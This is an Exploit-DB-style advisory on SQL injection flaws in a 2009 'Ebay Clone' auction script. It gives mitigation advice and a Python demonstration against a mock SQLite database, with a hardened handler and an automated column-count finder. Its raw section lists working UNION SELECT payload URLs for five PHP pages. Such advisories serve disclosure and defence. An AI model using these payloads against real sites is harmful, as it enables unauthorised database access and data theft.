Vendor: Ebay Clone
Author: Hamza 'MizoZ' N.
CVSS: 7.5 (HIGH)
CWE: CWE-89 (SQL Injection)
Product Name: Ebay Clone
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2009

Ebay Clone from (clone2009.com)

The Ebay Clone from clone2009.com is vulnerable to multiple SQL injection vulnerabilities. The 'id' GET parameter of gotourl.php, product_desc.php, view_items.php, bidhistory.php and view_feedback.php is placed unescaped into a numeric comparison in the SQL query (the demos inject without quotes), so an unauthenticated attacker can append a UNION SELECT and read arbitrary data from the database. In gotourl.php the selected value is used as a redirect target, so requesting [HOST]/[PATH]/gotourl.php?id=-1+union+select+version()-- redirects the visitor to [HOST]/[PATH]/ followed by the database version string returned by version(), which both confirms the injection and leaks the database version. The other four scripts are exploited with the same pattern: the negative id ensures the original query returns no row, and the UNION SELECT must supply exactly as many columns as the original statement (35 for product_desc.php, 18 for view_items.php and view_feedback.php, 34 for bidhistory.php in the demos below). The hex literals in the view_items.php and view_feedback.php demos decode to the HTML fragments <font color="red">HERE INJECTION</font> and <h1>HERE</h1>; placing them in column 11 shows which column is rendered on the page, and that column can then be replaced with any expression, such as a query against the users table.

Mitigation:

Developers should never concatenate request parameters into SQL text. For numeric identifiers such as 'id', cast the value to an integer (for example (int)$_GET['id'] or intval()) before it reaches the query, and preferably use prepared statements with bound parameters (mysqli or PDO) so that user input is always passed as data rather than as part of the SQL statement. Suppressing database error messages does not remove the vulnerability, since the demos below work without any error output.
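The following Python script is an added example and is not code from the Ebay Clone or from the advisory author. It reproduces the flawed pattern against an in-memory SQLite database with a constructed schema (the table and column names, the sample rows and the handler names are assumptions; the clone's real schema is not on the page), shows that the same "-1 union select ...--" payload that redirects gotourl.php to the database version returns the SQLite version here, shows a hardened handler rejecting the payload, and automates the column-count guessing that the 35-, 18- and 34-column demos imply. sqlite_version() stands in for MySQL's version().

```python
import sqlite3

# Constructed schema standing in for the clone's tables (the real names are not on the page).
SCHEMA = """
CREATE TABLE links (id INTEGER PRIMARY KEY, url TEXT);
INSERT INTO links VALUES (1, 'http://example.com/item/1');
INSERT INTO links VALUES (2, 'http://example.com/item/2');
CREATE TABLE products (id INTEGER PRIMARY KEY, title TEXT, description TEXT, price REAL);
INSERT INTO products VALUES (35, 'Widget', 'A constructed product row', 9.99);
"""


def connect():
    """Fresh in-memory database loaded with the constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def gotourl_vulnerable(db, id_param):
    """Flawed pattern assumed for gotourl.php: the raw GET value is spliced into the SQL text.
    Returns the redirect target, or None when no row matches."""
    sql = "SELECT url FROM links WHERE id=" + id_param
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def product_desc_vulnerable(db, id_param):
    """Same flaw with a wider SELECT, standing in for product_desc.php."""
    sql = "SELECT id, title, description, price FROM products WHERE id=" + id_param
    return db.execute(sql).fetchone()


def gotourl_fixed(db, id_param):
    """Hardened handler: enforce the integer type, then bind the value as a parameter
    so it is passed as data and can never be parsed as SQL."""
    try:
        id_int = int(id_param)
    except (TypeError, ValueError):
        return None
    row = db.execute("SELECT url FROM links WHERE id=?", (id_int,)).fetchone()
    return row[0] if row else None


def union_payload(n_cols, marker_col=None, marker="sqlite_version()"):
    """Build '-1 union select 1,2,...,n--' in the shape of the advisory's demos.
    The negative id makes the original query return no row, so only the UNION half
    is rendered; marker_col (1-based) swaps one numeric placeholder for an expression
    whose output reveals which column the page displays."""
    cols = [str(i) for i in range(1, n_cols + 1)]
    if marker_col is not None:
        cols[marker_col - 1] = marker
    return "-1 union select " + ",".join(cols) + "--"


def find_column_count(handler, db, max_cols=64):
    """Widen the UNION until the database stops rejecting the mismatched column count.
    This automates the manual guessing behind the 35-, 18- and 34-column demos."""
    for n in range(1, max_cols + 1):
        try:
            handler(db, union_payload(n))
            return n
        except sqlite3.OperationalError:
            continue  # "SELECTs to the left and right of UNION do not have the same number of result columns"
    return None


def db_version(db):
    """Ground truth: what the injected sqlite_version() is expected to return."""
    return db.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    db = connect()
    print("legitimate request:", gotourl_vulnerable(db, "2"))
    print("vulnerable redirect target:", gotourl_vulnerable(db, union_payload(1, 1)))
    print("fixed handler, same payload:", gotourl_fixed(db, union_payload(1, 1)))
    n = find_column_count(product_desc_vulnerable, db)
    print("product_desc column count:", n)
    print("row with marker in column 3:", product_desc_vulnerable(db, union_payload(n, 3)))
```

The fixed handler rejects the payload before any SQL is built; the cast alone would stop this numeric injection, and the bound parameter also protects string parameters where a cast does not apply.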

Exploit-DB raw data:

/*

Name : Ebay Clone from (clone2009.com)
Site : http://www.clone2009.com/

Author : Hamza 'MizoZ' N.
Email : mizozx[at]gmail[dot]com

Greetz : Zuka , GreyMen :)

*/

# 1st SQL injection :

File : gotourl.php , Get : id

[HOST]/[PATH]/gotourl.php?id=-1+union+select+version()--

=> You will be redirected to [HOST]/[PATH]/[VERSION]

Demo : http://server/gotourl.php?id=0+union+select+version()--

# 2nd SQL Injection :

File : product_desc.php  , Get : id

[HOST]/[PATH]/product_desc.php?id=[INJECTION]

Demo : http://server/product_desc.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

# 3rd SQL Injection :

File : view_items.php , Get : id

[HOST]/[PATH]/view_items.php?id=[INJECTION]

Demo : http://server/view_items.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c666f6e7420636f6c6f723d22726564223e4845524520494e4a454354494f4e3c2f666f6e743e,12,13,14,15,16,17,18--

# 4th SQL Injection :

File : bidhistory.php , Get : id

[HOST]/[PATH]/bidhistory.php?id=[INJECTION]

Demo : http://server/bidhistory.php?id=-45+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--

# 5th SQL Injection :

File : view_feedback.php , Get : id

[HOST]/[PATH]/view_feedback.php?id=[INJECTION]

Demo : http://server/view_feedback.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c68313e484552453c2f68313e,12,13,14,15,16,17,18--